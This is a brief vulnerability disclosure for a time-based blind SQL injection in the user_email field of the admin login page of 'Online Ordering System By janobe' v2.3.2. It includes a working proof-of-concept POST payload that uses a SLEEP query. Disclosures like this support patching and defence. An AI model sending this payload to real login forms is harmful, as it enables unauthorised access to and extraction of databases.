Online Ordering System By janobe - SQL injection vulnerability
- Exploit Author: zerrr0
Vendor Homepage
Description
- Due to lack of protection, parameter
user_emailin Online Ordering System By janobe v2.3.2/admin/login.phpcan be abused to injection SQL queries to extract information from databases. - Vulnerability file:
/admin/login.php - Parameter:
user_email
Proof of Concept (PoC) :
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_email=admin' AND (SELECT 5888 FROM (SELECT(SLEEP(5)))eEFG) AND 'BaRZ'='BaRZ&user_pass=admin&btnLogin=
---
